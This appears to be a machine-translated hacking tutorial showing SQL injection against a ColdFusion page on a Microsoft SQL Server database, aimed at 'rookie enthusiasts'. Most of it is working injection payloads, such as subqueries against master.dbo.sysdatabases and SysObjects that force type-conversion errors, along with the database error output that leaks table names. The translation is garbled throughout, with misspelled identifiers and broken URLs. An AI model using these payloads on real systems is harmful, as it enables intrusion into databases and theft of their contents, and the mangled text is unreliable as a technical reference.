Good depression, fast exam, take the Internet. When you go to this address, habitually see if he has a safe vulnerability http://www.test.com/openaccess/index.cfm?id=11 submit http://www.test.com/openaccess/index. ? cfm ID = 11; returns error Occurred While Processing Request error Diagnostic Information ODBC error Code = 37000 (syntax error or access violation) [Microsoft] [ODBC SQL Server Driver] [SQL Server] Incorrect syntax near the keyword 'order' The. Error Occurred While Processing An Element with a general Identifier of (CFQuery), Occupying Document Position (72:57). Date / Time: 06/05/04 13:37:57 Browser: Mozilla / 4.0 ( Compatible; Msie 6.0; Windows NT 5.1) Remote Address: 61.178.21.189 query string: id = 11; actually CFM attacks are as simple as ASP, see the return information of the above, more than ASP returns. But it seems that there are very few people who write CFM, so I wrote it. The above is the MSSQL database, many methods can be used, in order to facilitate the vast rookie enthusiasts, just talk about how to explode. Everyone is very familiar with the across COOL of the ASP, then, now come to COOL CFM! ! Submitted: And 0 = (Select Count (*) from master.dbo.sdatabases where name> 1 and dbid = 6) Depressed, did not return to our expectation, he doesn't give me, I will change the method, come back. Submitted: And% 201 = (SELECT% 20top% 201% 20NAME% 20FROM (SELECT% 20top% 2012% 20ID, Name% 20FROM% 20SysObjects% 20where% 20XTYPE = CHAR (85))% 20T% 20DESC ) returns: error Diagnostic Information ODBC error Code = 22005 (error in assignment) [Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error converting the nvarchar value 'ANALYST_MST' to a column of data type int The error occurred while. Processing an element with a general identifier of (cfquery), Occupying Document Position (50: 2) to (50:51). . . . . . See it, haha, Xiaozhu's statement is fierce! Now one check, change to TOP% 201% 20Name 1, start from 1, to 6, return an expected thing. . . . . . .
